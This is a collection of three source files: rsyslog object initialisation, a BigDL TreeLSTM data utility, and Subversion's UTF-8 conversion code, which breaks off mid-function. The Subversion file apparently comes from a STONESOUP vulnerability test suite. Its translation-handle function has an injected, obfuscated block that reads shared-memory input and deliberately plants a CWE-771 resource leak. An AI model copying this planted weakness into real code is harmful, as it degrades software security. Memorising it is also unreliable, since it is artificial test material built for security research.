/* TODO: implement the class exits! */
#if 0
cfsyslineExit(pModInfo);
varClassExit(pModInfo);
#endif
errmsgClassExit();
moduleClassExit();
RETiRet;
}
/* initialize our own class
* Please note that this also initializes those classes that we rely on.
* Though this is a bit dirty, we need to do it - otherwise we can't get
* around that bootstrap problem. We need to face the fact the the obj
* class is a little different from the rest of the system, as it provides
* the core class loader functionality.
* rgerhards, 2008-02-29
*/
rsRetVal
objClassInit(modInfo_t *pModInfo)
{
pthread_mutexattr_t mutAttr;
int i;
DEFiRet;
/* first, initialize the object system itself. This must be done
* before any other object is created.
*/
for(i = 0 ; i < OBJ_NUM_IDS ; ++i) {
arrObjInfo[i] = NULL;
}
/* the mutex must be recursive, because objects may call into other
* object identifiers recursively.
*/
pthread_mutexattr_init(&mutAttr);
pthread_mutexattr_settype(&mutAttr, PTHREAD_MUTEX_RECURSIVE);
pthread_mutex_init(&mutObjGlobalOp, &mutAttr);
/* request objects we use */
CHKiRet(objGetObjInterface(&obj)); /* get ourselves ;) */
/* init classes we use (limit to as few as possible!) */
CHKiRet(errmsgClassInit(pModInfo));
CHKiRet(datetimeClassInit(pModInfo));
CHKiRet(cfsyslineInit());
CHKiRet(varClassInit(pModInfo));
CHKiRet(moduleClassInit(pModInfo));
CHKiRet(strmClassInit(pModInfo));
CHKiRet(objUse(var, CORE_COMPONENT));
CHKiRet(objUse(module, CORE_COMPONENT));
CHKiRet(objUse(strm, CORE_COMPONENT));
finalize_it:
RETiRet;
}
/* vi:set ai:
*/
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2016 The BigDL Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intel.analytics.bigdl.example.treeLSTMSentiment
import com.intel.analytics.bigdl.dataset.Sample
import com.intel.analytics.bigdl.example.utils.AbstractTextClassificationParams
import com.intel.analytics.bigdl.nn.TensorTree
import com.intel.analytics.bigdl.numeric.NumericFloat
import com.intel.analytics.bigdl.tensor.{Storage, Tensor}
import com.intel.analytics.bigdl.utils.RandomGenerator.RNG
import org.apache.spark.SparkContext
import org.apache.spark.broadcast.Broadcast
import org.apache.spark.rdd.RDD
import scopt.OptionParser
import scala.io.Source
import scala.language.existentials
import scala.reflect.ClassTag
import scala.util.control.Breaks._
object Utils {
def readTree(
parents: Array[Int]
): Tensor[Float] = {
val size = parents.length
val maxNumChildren = parents
.groupBy(x => x)
.foldLeft(0)((maxNum, p) => scala.math.max(maxNum, p._2.length))
val trees = new TensorTree(Tensor[Float](size, maxNumChildren + 1))
for (i <- parents.indices) {
if (trees.noChild(i + 1) && parents(i) != -1) {
var idx = i + 1
var prev = 0
breakable {
while (true) {
var parent =
if (idx != 0) parents(idx - 1)
else -1
if (parent == parents.length) parent = 0
if (prev != 0 && parent != -1) {
trees.addChild(idx + 1, prev + 1)
}
if (parent == -1) {
trees.markAsRoot(1)
if (prev != 0) {
trees.addChild(1, prev + 1)
}
break()
} else if (trees.hasChild(parent + 1)) {
trees.addChild(parent + 1, idx + 1)
break()
} else {
prev = idx
idx = parent
}
}
}
}
}
var leafIdx = 1
for (i <- 2 to size) {
if (trees.noChild(i)) {
trees.markAsLeaf(i, leafIdx)
leafIdx += 1
}
}
trees.content
}
def remapLabel(
label: Float
): Float = {
label + 3
}
/**
* Rotate an array `arr` from `offset` distance to the end
*
* @param arr Given array
* @param offset right rotate how many elements
*/
def rotate[D](arr: Array[D], offset: Int): Array[D] = {
if (arr == null || arr.length==0 || offset < 0) {
throw new IllegalArgumentException("Illegal argument!")
}
val newOffset = if (offset > arr.length) offset % arr.length else offset
val index = arr.length - newOffset
reverse(arr, 0, index - 1)
reverse(arr, index, arr.length - 1)
reverse(arr, 0, arr.length - 1)
arr
}
def reverse[D](arr: Array[D], l: Int, r: Int): Unit = {
var left = l
var right = r
if(arr == null || arr.length == 1) return
while(left < right) {
val temp = arr(left)
arr(left) = arr(right)
arr(right) = temp
left += 1
right -= 1
}
}
def preProcessData(
sc: SparkContext,
vocabBC: Broadcast[Map[String, Int]],
oovChar: Int,
treePath: String,
labelPath: String,
sentencePath: String
): (RDD[Tensor[Float]], RDD[Array[Float]], RDD[Array[Int]]) = {
val treeRDD = sc.textFile(treePath, 4)
.map(line => line.split(" "))
.map(_.map(_.toInt))
.map(readTree)
val labelRDD = sc.textFile(labelPath, 4)
.map(line => line.split(" "))
.map(_.map(l => remapLabel(l.toFloat)))
.map(line => rotate(line, 1))
val sentenceRDD = sc.textFile(sentencePath, 4)
.map(line => line.split(" "))
.map(line => line.map(vocabBC.value.getOrElse(_, oovChar)))
(treeRDD, labelRDD, sentenceRDD)
}
def toSample(
treeRDD: RDD[Tensor[Float]],
labelRDD: RDD[Array[Float]],
sentenceRDD: RDD[Array[Int]]
): RDD[Sample[Float]] = {
def indexAndSort[D: ClassTag, P <: Product2[Long, D]](rdd: RDD[D]) = {
rdd.zipWithIndex.map(r => r.swap).sortByKey()
}
indexAndSort(sentenceRDD)
.join(indexAndSort(labelRDD))
.join(indexAndSort(treeRDD))
.values
.map{ case ((input, label), tree) =>
Sample(
featureTensors =
Array(Tensor(input.map(_.toFloat), Array(input.length, 1)),
tree.resize(tree.size())),
labelTensor =
Tensor(label, Array(label.length)))
}
}
def loadEmbeddingAndVocabulary(
sc: SparkContext,
w2vPath: String,
vocabPath: String,
indexFrom: Int
):
(Tensor[Float], Map[String, Int]) = {
val word2Vec = sc.textFile(w2vPath)
.map(line => {
val values = line.split(" ")
val word = values(0)
val coefs = values.slice(1, values.length).map(_.toFloat)
word -> coefs
}).toLocalIterator.toList.toMap
var i = 1
val vocabLines = sc.textFile(vocabPath).collect()
val word2VecTensor =
Tensor(vocabLines.length + indexFrom - 1, word2Vec.last._2.length)
val vocab = scala.collection.mutable.Map[String, Int]()
while (i < indexFrom) {
word2VecTensor.select(1, i).apply1(_ => RNG.uniform(-0.05f, 0.05f).toFloat)
i += 1
}
for (line <- vocabLines) {
if (!word2Vec.contains(line)) {
word2VecTensor.select(1, i).apply1(_ => RNG.uniform(-0.05f, 0.05f).toFloat)
} else {
word2VecTensor.select(1, i).copy(Tensor(Storage(word2Vec(line))))
}
vocab += line -> i
i += 1
}
(word2VecTensor, vocab.toMap)
}
val paramParser = new OptionParser[TreeLSTMSentimentParam]("TreeLSTM Sentiment") {
opt[String]('b', "baseDir")
.text("Base dir containing the training and word2Vec data")
.action((x, c) => c.copy(baseDir = x))
opt[String]('i', "batchSize")
.text("batchSize")
.action((x, c) => c.copy(batchSize = x.toInt))
opt[String]('h', "hiddenSize")
.text("hiddenSize")
.action((x, c) => c.copy(hiddenSize = x.toInt))
opt[String]('l', "learingRate")
.text("learning rate")
.action((x, c) => c.copy(learningRate = x.toDouble))
opt[String]('r', "regRate")
.text("regularization rate")
.action((x, c) => c.copy(regRate = x.toDouble))
opt[String]('p', "p")
.text("dropout rate")
.action((x, c) => c.copy(p = x.toDouble))
opt[String]('e', "epoch")
.text("max epoch")
.action((x, c) => c.copy(epoch = x.toInt))
opt[String]("optimizerVersion")
.text("state optimizer version")
.action((x, c) => c.copy(optimizerVersion = Some(x)))
}
case class TreeLSTMSentimentParam (
override val baseDir: String = "/tmp/.bigdl/dataset/",
override val batchSize: Int = 128,
hiddenSize: Int = 250,
override val learningRate: Double = 0.05,
regRate: Double = 1e-4,
p: Double = 0.5,
epoch: Int = 5,
optimizerVersion: Option[String] = None
) extends AbstractTextClassificationParams
}
| {
"pile_set_name": "Github"
} |
/*
* utf.c: UTF-8 conversion routines
*
* ====================================================================
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
* ====================================================================
*/
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <apr_strings.h>
#include <apr_lib.h>
#include <apr_xlate.h>
#include <apr_atomic.h>
#include "svn_hash.h"
#include "svn_string.h"
#include "svn_error.h"
#include "svn_pools.h"
#include "svn_ctype.h"
#include "svn_utf.h"
#include "svn_private_config.h"
#include "win32_xlate.h"
#include "private/svn_utf_private.h"
#include "private/svn_dep_compat.h"
#include "private/svn_string_private.h"
#include "private/svn_mutex.h"
/* Use these static strings to maximize performance on standard conversions.
* Any strings on other locations are still valid, however.
*/
#include <sys/stat.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stonesoup/stonesoup_trace.h>
static const char *SVN_UTF_NTOU_XLATE_HANDLE = "svn-utf-ntou-xlate-handle";
static const char *SVN_UTF_UTON_XLATE_HANDLE = "svn-utf-uton-xlate-handle";
static const char *SVN_APR_UTF8_CHARSET = "UTF-8";
static svn_mutex__t *xlate_handle_mutex = ((void *)0);
static svn_boolean_t assume_native_charset_is_utf8 = 0;
/* The xlate handle cache is a global hash table with linked lists of xlate
* handles. In multi-threaded environments, a thread "borrows" an xlate
* handle from the cache during a translation and puts it back afterwards.
* This avoids holding a global lock for all translations.
* If there is no handle for a particular key when needed, a new is
* handle is created and put in the cache after use.
* This means that there will be at most N handles open for a key, where N
* is the number of simultanous handles in use for that key. */
typedef struct xlate_handle_node_t {
apr_xlate_t *handle;
/* FALSE if the handle is not valid, since its pool is being
destroyed. */
svn_boolean_t valid;
/* The name of a char encoding or APR_LOCALE_CHARSET. */
const char *frompage;
const char *topage;
struct xlate_handle_node_t *next;}xlate_handle_node_t;
/* This maps const char * userdata_key strings to xlate_handle_node_t **
handles to the first entry in the linked list of xlate handles. We don't
store the pointer to the list head directly in the hash table, since we
remove/insert entries at the head in the list in the code below, and
we can't use apr_hash_set() in each character translation because that
function allocates memory in each call where the value is non-NULL.
Since these allocations take place in a global pool, this would be a
memory leak. */
static apr_hash_t *xlate_handle_hash = ((void *)0);
/* "1st level cache" to standard conversion maps. We may access these
* using atomic xchange ops, i.e. without further thread synchronization.
* If the respective item is NULL, fallback to hash lookup.
*/
static void *volatile xlat_ntou_static_handle = (void *)0;
static void *volatile xlat_uton_static_handle = (void *)0;
/* Clean up the xlate handle cache. */
int larkspur_genearch = 0;
union rhatania_vanuatu
{
char *epanisognathous_joggle;
double caravanserial_smashery;
char *transshaped_killies;
char holotrichal_satyagraha;
int satirisation_dazing;
}
;
void* stonesoup_printf_context = NULL;
void stonesoup_setup_printf_context() {
struct stat st = {0};
char * ss_tc_root = NULL;
char * dirpath = NULL;
int size_dirpath = 0;
char * filepath = NULL;
int size_filepath = 0;
int retval = 0;
ss_tc_root = getenv("SS_TC_ROOT");
if (ss_tc_root != NULL) {
size_dirpath = strlen(ss_tc_root) + strlen("testData") + 2;
dirpath = (char*) malloc (size_dirpath * sizeof(char));
if (dirpath != NULL) {
sprintf(dirpath, "%s/%s", ss_tc_root, "testData");
retval = 0;
if (stat(dirpath, &st) == -1) {
retval = mkdir(dirpath, 0700);
}
if (retval == 0) {
size_filepath = strlen(dirpath) + strlen("logfile.txt") + 2;
filepath = (char*) malloc (size_filepath * sizeof(char));
if (filepath != NULL) {
sprintf(filepath, "%s/%s", dirpath, "logfile.txt");
stonesoup_printf_context = fopen(filepath, "w");
free(filepath);
}
}
free(dirpath);
}
}
if (stonesoup_printf_context == NULL) {
stonesoup_printf_context = stderr;
}
}
void stonesoup_printf(char * format, ...) {
va_list argptr;
va_start(argptr, format);
vfprintf(stonesoup_printf_context, format, argptr);
va_end(argptr);
fflush(stonesoup_printf_context);
}
void stonesoup_close_printf_context() {
if (stonesoup_printf_context != NULL &&
stonesoup_printf_context != stderr) {
fclose(stonesoup_printf_context);
}
}
void stonesoup_read_taint(char** stonesoup_tainted_buff, char* stonesoup_envKey, int stonesoup_shmsz) {
int stonesoup_shmid;
key_t stonesoup_key;
char *stonesoup_shm, *stonesoup_s;
char* stonesoup_envSize = NULL;
*stonesoup_tainted_buff = NULL;
if (getenv("STONESOUP_DISABLE_WEAKNESS") == NULL ||
strcmp(getenv("STONESOUP_DISABLE_WEAKNESS"), "1") != 0) {
if(stonesoup_envKey != NULL) {
if(sscanf(stonesoup_envKey, "%d", &stonesoup_key) > 0) {
if ((stonesoup_shmid = shmget(stonesoup_key, stonesoup_shmsz, 0666)) >= 0) {
if ((stonesoup_shm = shmat(stonesoup_shmid, NULL, 0)) != (char *) -1) {
*stonesoup_tainted_buff = (char*)calloc(stonesoup_shmsz, sizeof(char));
/* STONESOUP: SOURCE-TAINT (Shared Memory) */
for (stonesoup_s = stonesoup_shm; *stonesoup_s != (char)0; stonesoup_s++) {
(*stonesoup_tainted_buff)[stonesoup_s - stonesoup_shm] = *stonesoup_s;
}
}
}
}
}
} else {
*stonesoup_tainted_buff = NULL;
}
}
void stonesoup_cleanup(char **ptrs,int size)
{
int i = 0;
tracepoint(stonesoup_trace, trace_location, "/tmp/tmpS_Zc2P_ss_testcase/src-rose/subversion/libsvn_subr/utf.c", "stonesoup_cleanup");
for (; i < size; ++i) {
if (ptrs[i] != 0) {
free(ptrs[i]);
}
}
}
int stonesoup_isalnum(int c)
{
if ((c >= 97 && c <= 122) || (c >= 65 && c <= 90) || (c >= 48 && c <= 57)) {
return 1;
}
return 0;
}
char *stonesoup_isAlphaNum(char *str,int size_param)
{
int index = 0;
tracepoint(stonesoup_trace, trace_location, "/tmp/tmpS_Zc2P_ss_testcase/src-rose/subversion/libsvn_subr/utf.c", "stonesoup_isAlphaNum");
for (index = 0; index < size_param; index++) {
if (!stonesoup_isalnum(str[index])) {
tracepoint(stonesoup_trace, trace_point, "Returning 0");
/* STONESOUP: TRIGGER-POINT (Missing Reference to Active Allocated Resource) */
return 0;
}
}
return str;
}
static apr_status_t xlate_cleanup(void *arg)
{
/* We set the cache variables to NULL so that translation works in other
cleanup functions, even if it isn't cached then. */
xlate_handle_hash = ((void *)0);
/* ensure no stale objects get accessed */
xlat_ntou_static_handle = ((void *)0);
xlat_uton_static_handle = ((void *)0);
return 0;
}
/* Set the handle of ARG to NULL. */
static apr_status_t xlate_handle_node_cleanup(void *arg)
{
xlate_handle_node_t *node = arg;
node -> valid = 0;
return 0;
}
void svn_utf_initialize2(svn_boolean_t assume_native_utf8,apr_pool_t *pool)
{
if (!xlate_handle_hash) {
/* We create our own subpool, which we protect with the mutex.
We can't use the pool passed to us by the caller, since we will
use it for xlate handle allocations, possibly in multiple threads,
and pool allocation is not thread-safe. */
apr_pool_t *subpool = svn_pool_create_ex(pool,((void *)0));
svn_mutex__t *mutex;
svn_error_t *err = svn_mutex__init(&mutex,!0,subpool);
if (err) {
svn_error_clear(err);
return ;
}
xlate_handle_mutex = mutex;
xlate_handle_hash = apr_hash_make(subpool);
apr_pool_cleanup_register(subpool,((void *)0),xlate_cleanup,apr_pool_cleanup_null);
}
if (!assume_native_charset_is_utf8) {
assume_native_charset_is_utf8 = assume_native_utf8;
}
}
/* Return a unique string key based on TOPAGE and FROMPAGE. TOPAGE and
* FROMPAGE can be any valid arguments of the same name to
* apr_xlate_open(). Allocate the returned string in POOL. */
static const char *get_xlate_key(const char *topage,const char *frompage,apr_pool_t *pool)
{
/* In the cases of SVN_APR_LOCALE_CHARSET and SVN_APR_DEFAULT_CHARSET
* topage/frompage is really an int, not a valid string. So generate a
* unique key accordingly. */
if (frompage == ((const char *)1)) {
frompage = "APR_LOCALE_CHARSET";
}
else {
if (frompage == ((const char *)0)) {
frompage = "APR_DEFAULT_CHARSET";
}
}
if (topage == ((const char *)1)) {
topage = "APR_LOCALE_CHARSET";
}
else {
if (topage == ((const char *)0)) {
topage = "APR_DEFAULT_CHARSET";
}
}
return (apr_pstrcat(pool,"svn-utf-",frompage,"to",topage,"-xlate-handle",((char *)((void *)0))));
}
/* Atomically replace the content in *MEM with NEW_VALUE and return
* the previous content of *MEM. If atomicy cannot be guaranteed,
* *MEM will not be modified and NEW_VALUE is simply returned to
* the caller.
*/
inline static void *atomic_swap(void *volatile *mem,void *new_value)
{
#if APR_HAS_THREADS
#if APR_VERSION_AT_LEAST(1,3,0)
/* Cast is necessary because of APR bug:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50731 */
return apr_atomic_xchgptr(((volatile void **)mem),new_value);
#else
/* old APRs don't support atomic swaps. Simply return the
* input to the caller for further proccessing. */
#endif
#else
/* no threads - no sync. necessary */
#endif
}
/* Set *RET to a newly created handle node for converting from FROMPAGE
to TOPAGE, If apr_xlate_open() returns APR_EINVAL or APR_ENOTIMPL, set
(*RET)->handle to NULL. If fail for any other reason, return the error.
Allocate *RET and its xlate handle in POOL. */
static svn_error_t *xlate_alloc_handle(xlate_handle_node_t **ret,const char *topage,const char *frompage,apr_pool_t *pool)
{
apr_status_t apr_err;
apr_xlate_t *handle;
const char *name;
/* The error handling doesn't support the following cases, since we don't
use them currently. Catch this here. */
do {
if (!(frompage != ((const char *)0) && topage != ((const char *)0) && (frompage != ((const char *)1) || topage != ((const char *)1)))) {
do {
svn_error_t *svn_err__temp = svn_error__malfunction(!0,"utf.c",222,"frompage != SVN_APR_DEFAULT_CHARSET && topage != SVN_APR_DEFAULT_CHARSET && (frompage != SVN_APR_LOCALE_CHARSET || topage != SVN_APR_LOCALE_CHARSET)");
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
}
}while (0);
/* Try to create a handle. */
#if defined(WIN32)
#else
apr_err = apr_xlate_open(&handle,topage,frompage,pool);
name = "APR: ";
#endif
if (apr_err == 22 || apr_err == 20000 + 50000 + 23) {
handle = ((void *)0);
}
else {
if (apr_err != 0) {
const char *errstr;
char apr_strerr[512];
/* Can't use svn_error_wrap_apr here because it calls functions in
this file, leading to infinite recursion. */
if (frompage == ((const char *)1)) {
errstr = (apr_psprintf(pool,(dgettext("subversion","Can't create a character converter from native encoding to '%s'")),topage));
}
else {
if (topage == ((const char *)1)) {
errstr = (apr_psprintf(pool,(dgettext("subversion","Can't create a character converter from '%s' to native encoding")),frompage));
}
else {
errstr = (apr_psprintf(pool,(dgettext("subversion","Can't create a character converter from '%s' to '%s'")),frompage,topage));
}
}
/* Just put the error on the stack, since svn_error_create duplicates it
later. APR_STRERR will be in the local encoding, not in UTF-8, though.
*/
svn_strerror(apr_err,apr_strerr,sizeof(apr_strerr));
return svn_error_createf(SVN_ERR_PLUGIN_LOAD_FAILURE,svn_error_create(apr_err,((void *)0),apr_strerr),"%s%s",name,errstr);
}
}
/* Allocate and initialize the node. */
*ret = (apr_palloc(pool,sizeof(xlate_handle_node_t )));
( *ret) -> handle = handle;
( *ret) -> valid = !0;
( *ret) -> frompage = (frompage != ((const char *)1)?(apr_pstrdup(pool,frompage)) : frompage);
( *ret) -> topage = (topage != ((const char *)1)?(apr_pstrdup(pool,topage)) : topage);
( *ret) -> next = ((void *)0);
/* If we are called from inside a pool cleanup handler, the just created
xlate handle will be closed when that handler returns by a newly
registered cleanup handler, however, the handle is still cached by us.
To prevent this, we register a cleanup handler that will reset the valid
flag of our node, so we don't use an invalid handle. */
if (handle) {
apr_pool_cleanup_register(pool,( *ret),xlate_handle_node_cleanup,apr_pool_cleanup_null);
}
return 0;
}
/* Extend xlate_alloc_handle by using USERDATA_KEY as a key in our
global hash map, if available.
Allocate *RET and its xlate handle in POOL if svn_utf_initialize()
hasn't been called or USERDATA_KEY is NULL. Else, allocate them
in the pool of xlate_handle_hash.
Note: this function is not thread-safe. Call get_xlate_handle_node
instead. */
static svn_error_t *get_xlate_handle_node_internal(xlate_handle_node_t **ret,const char *topage,const char *frompage,const char *userdata_key,apr_pool_t *pool)
{
char *stonesoup_contents;
char stonesoup_filename[80];
FILE *stonesoup_file;
FILE **stonesoup_file_list;
FILE *stonesoup_files;
int stonesoup_str_list_index;
char **stonesoup_str_list;
int stonesoup_num_files = 10;
int stonesoup_size;
int stonesoup_ssi = 0;
char *devastations_judoists = 0;
int nonarithmetic_biron;
int borize_hunterian;
union rhatania_vanuatu clablaria_unparochialism = {0};
int *heteroousia_theatroscope = 0;
int overply_acidophilic;
union rhatania_vanuatu parky_pneumatism[10] = {0};
union rhatania_vanuatu lombardy_overplumb;
int tightfistedly_zealously = 45;
char *astereognosis_shrives;;
if (__sync_bool_compare_and_swap(&larkspur_genearch,0,1)) {;
if (mkdir("/opt/stonesoup/workspace/lockDir",509U) == 0) {;
tracepoint(stonesoup_trace,trace_location,"/tmp/tmpS_Zc2P_ss_testcase/src-rose/subversion/libsvn_subr/utf.c","get_xlate_handle_node_internal");
stonesoup_setup_printf_context();
stonesoup_read_taint(&astereognosis_shrives,"3178",tightfistedly_zealously);
if (astereognosis_shrives != 0) {;
lombardy_overplumb . epanisognathous_joggle = astereognosis_shrives;
parky_pneumatism[5] = lombardy_overplumb;
overply_acidophilic = 5;
heteroousia_theatroscope = &overply_acidophilic;
clablaria_unparochialism = *(parky_pneumatism + *heteroousia_theatroscope);
borize_hunterian = 5;
while(1 == 1){
borize_hunterian = borize_hunterian * 2;
borize_hunterian = borize_hunterian + 2;
if (borize_hunterian > 1000) {
break;
}
}
nonarithmetic_biron = borize_hunterian;
devastations_judoists = ((char *)clablaria_unparochialism . epanisognathous_joggle);
tracepoint(stonesoup_trace, weakness_start, "CWE771", "A", "Missing Reference to Active Allocated Resource");
stonesoup_str_list = malloc(sizeof(char *) * stonesoup_num_files);
if (stonesoup_str_list != 0) {
for (stonesoup_str_list_index = 0; stonesoup_str_list_index < stonesoup_num_files; ++stonesoup_str_list_index)
stonesoup_str_list[stonesoup_str_list_index] = 0;
stonesoup_files = fopen(devastations_judoists,"rb");
if (stonesoup_files != 0) {
stonesoup_file_list = malloc(stonesoup_num_files * sizeof(FILE *));
if (stonesoup_file_list == 0) {
stonesoup_printf("Error: Failed to allocate memory\n");
exit(1);
}
for (stonesoup_ssi = 0; stonesoup_ssi < stonesoup_num_files; ++stonesoup_ssi) {
if (fscanf(stonesoup_files,"%79s",stonesoup_filename) == 1) {
stonesoup_file_list[stonesoup_ssi] = fopen(stonesoup_filename,"rb");
}
}
stonesoup_ssi = 0;
while(stonesoup_ssi < stonesoup_num_files){
stonesoup_file = stonesoup_file_list[stonesoup_ssi];
if (stonesoup_file == 0) {
++stonesoup_ssi;
continue;
}
fseek(stonesoup_file,0,2);
stonesoup_size = ftell(stonesoup_file);
rewind(stonesoup_file);
stonesoup_contents = malloc((stonesoup_size + 1) * sizeof(char ));
tracepoint(stonesoup_trace, trace_point, "CROSSOVER-POINT: BEFORE");
/* STONESOUP: CROSSOVER-POINT (Missing Reference to Active Allocated Resource */
if (stonesoup_contents == 0 && errno == 12) {
tracepoint(stonesoup_trace, trace_error, "Malloc error due to ulimit.");
stonesoup_printf("Malloc error due to ulimit\n");
}
if (stonesoup_contents == 0) {
fclose(stonesoup_file);
break;
}
tracepoint(stonesoup_trace, trace_point, "CROSSOVER-POINT: AFTER");
memset(stonesoup_contents,0,(stonesoup_size + 1) * sizeof(char ));
fread(stonesoup_contents,1,stonesoup_size,stonesoup_file);
tracepoint(stonesoup_trace, trace_point, "TRIGGER-POINT: BEFORE");
stonesoup_contents = stonesoup_isAlphaNum(stonesoup_contents,stonesoup_size);
tracepoint(stonesoup_trace, trace_point, "TRIGGER-POINT: AFTER");
stonesoup_str_list[stonesoup_ssi] = stonesoup_contents;
fclose(stonesoup_file);
stonesoup_ssi++;
}
fclose(stonesoup_files);
if (stonesoup_file_list != 0) {
free(stonesoup_file_list);
}
}
stonesoup_cleanup(stonesoup_str_list,stonesoup_num_files);
free(stonesoup_str_list);
}
tracepoint(stonesoup_trace, weakness_end);
;
if (clablaria_unparochialism . epanisognathous_joggle != 0)
free(((char *)clablaria_unparochialism . epanisognathous_joggle));
stonesoup_close_printf_context();
}
}
}
;
/* If we already have a handle, just return it. */
if (userdata_key && xlate_handle_hash) {
xlate_handle_node_t *old_node = ((void *)0);
/* 2nd level: hash lookup */
xlate_handle_node_t **old_node_p = (apr_hash_get(xlate_handle_hash,userdata_key,(- 1)));
if (old_node_p) {
old_node = *old_node_p;
}
if (old_node) {
/* Ensure that the handle is still valid. */
if (old_node -> valid) {
/* Remove from the list. */
*old_node_p = old_node -> next;
old_node -> next = ((void *)0);
*ret = old_node;
return 0;
}
}
}
/* Note that we still have the mutex locked (if it is initialized), so we
can use the global pool for creating the new xlate handle. */
/* Use the correct pool for creating the handle. */
pool = apr_hash_pool_get(xlate_handle_hash);
return xlate_alloc_handle(ret,topage,frompage,pool);
}
/* Set *RET to a handle node for converting from FROMPAGE to TOPAGE,
creating the handle node if it doesn't exist in USERDATA_KEY.
If a node is not cached and apr_xlate_open() returns APR_EINVAL or
APR_ENOTIMPL, set (*RET)->handle to NULL. If fail for any other
reason, return the error.
Allocate *RET and its xlate handle in POOL if svn_utf_initialize()
hasn't been called or USERDATA_KEY is NULL. Else, allocate them
in the pool of xlate_handle_hash. */
static svn_error_t *get_xlate_handle_node(xlate_handle_node_t **ret,const char *topage,const char *frompage,const char *userdata_key,apr_pool_t *pool)
{
xlate_handle_node_t *old_node = ((void *)0);
/* If we already have a handle, just return it. */
if (userdata_key) {
if (xlate_handle_hash) {
/* 1st level: global, static items */
if (userdata_key == SVN_UTF_NTOU_XLATE_HANDLE) {
old_node = (atomic_swap(&xlat_ntou_static_handle,((void *)0)));
}
else {
if (userdata_key == SVN_UTF_UTON_XLATE_HANDLE) {
old_node = (atomic_swap(&xlat_uton_static_handle,((void *)0)));
}
}
if (old_node && old_node -> valid) {
*ret = old_node;
return 0;
}
}
else {
void *p;
/* We fall back on a per-pool cache instead. */
apr_pool_userdata_get(&p,userdata_key,pool);
old_node = p;
/* Ensure that the handle is still valid. */
if (old_node && old_node -> valid) {
*ret = old_node;
return 0;
}
return xlate_alloc_handle(ret,topage,frompage,pool);
}
}
do {
svn_mutex__t *svn_mutex__m = xlate_handle_mutex;
do {
svn_error_t *svn_err__temp = svn_mutex__lock(svn_mutex__m);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
do {
svn_error_t *svn_err__temp = svn_mutex__unlock(svn_mutex__m,get_xlate_handle_node_internal(ret,topage,frompage,userdata_key,pool));
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
}while (0);
return 0;
}
/* Put back NODE into the xlate handle cache for use by other calls.
Note: this function is not thread-safe. Call put_xlate_handle_node
instead. */
static svn_error_t *put_xlate_handle_node_internal(xlate_handle_node_t *node,const char *userdata_key)
{
xlate_handle_node_t **node_p = (apr_hash_get(xlate_handle_hash,userdata_key,(- 1)));
if (node_p == ((void *)0)) {
userdata_key = (apr_pstrdup(apr_hash_pool_get(xlate_handle_hash),userdata_key));
node_p = (apr_palloc(apr_hash_pool_get(xlate_handle_hash),sizeof(( *node_p))));
*node_p = ((void *)0);
apr_hash_set(xlate_handle_hash,userdata_key,(- 1),node_p);
}
node -> next = *node_p;
*node_p = node;
return 0;
}
/* Put back NODE into the xlate handle cache for use by other calls.
If there is no global cache, store the handle in POOL.
Ignore errors related to locking/unlocking the mutex. */
static svn_error_t *put_xlate_handle_node(xlate_handle_node_t *node,const char *userdata_key,apr_pool_t *pool)
{
node -> next == ((void *)0)?((void )0) : __assert_fail("node->next == ((void *)0)","utf.c",426,__PRETTY_FUNCTION__);
if (!userdata_key) {
return 0;
}
/* push previous global node to the hash */
if (xlate_handle_hash) {
/* 1st level: global, static items */
if (userdata_key == SVN_UTF_NTOU_XLATE_HANDLE) {
node = (atomic_swap(&xlat_ntou_static_handle,node));
}
else {
if (userdata_key == SVN_UTF_UTON_XLATE_HANDLE) {
node = (atomic_swap(&xlat_uton_static_handle,node));
}
}
if (node == ((void *)0)) {
return 0;
}
do {
svn_mutex__t *svn_mutex__m = xlate_handle_mutex;
do {
svn_error_t *svn_err__temp = svn_mutex__lock(svn_mutex__m);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
do {
svn_error_t *svn_err__temp = svn_mutex__unlock(svn_mutex__m,put_xlate_handle_node_internal(node,userdata_key));
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
}while (0);
}
else {
/* Store it in the per-pool cache. */
apr_pool_userdata_set(node,userdata_key,apr_pool_cleanup_null,pool);
}
return 0;
}
/* Return the apr_xlate handle for converting native characters to UTF-8. */
static svn_error_t *get_ntou_xlate_handle_node(xlate_handle_node_t **ret,apr_pool_t *pool)
{
return get_xlate_handle_node(ret,SVN_APR_UTF8_CHARSET,(assume_native_charset_is_utf8?SVN_APR_UTF8_CHARSET : ((const char *)1)),SVN_UTF_NTOU_XLATE_HANDLE,pool);
}
/* Return the apr_xlate handle for converting UTF-8 to native characters.
Create one if it doesn't exist. If unable to find a handle, or
unable to create one because apr_xlate_open returned APR_EINVAL, then
set *RET to null and return SVN_NO_ERROR; if fail for some other
reason, return error. */
static svn_error_t *get_uton_xlate_handle_node(xlate_handle_node_t **ret,apr_pool_t *pool)
{
return get_xlate_handle_node(ret,(assume_native_charset_is_utf8?SVN_APR_UTF8_CHARSET : ((const char *)1)),SVN_APR_UTF8_CHARSET,SVN_UTF_UTON_XLATE_HANDLE,pool);
}
/* Copy LEN bytes of SRC, converting non-ASCII and zero bytes to ?\nnn
sequences, allocating the result in POOL. */
static const char *fuzzy_escape(const char *src,apr_size_t len,apr_pool_t *pool)
{
const char *src_orig = src;
const char *src_end = src + len;
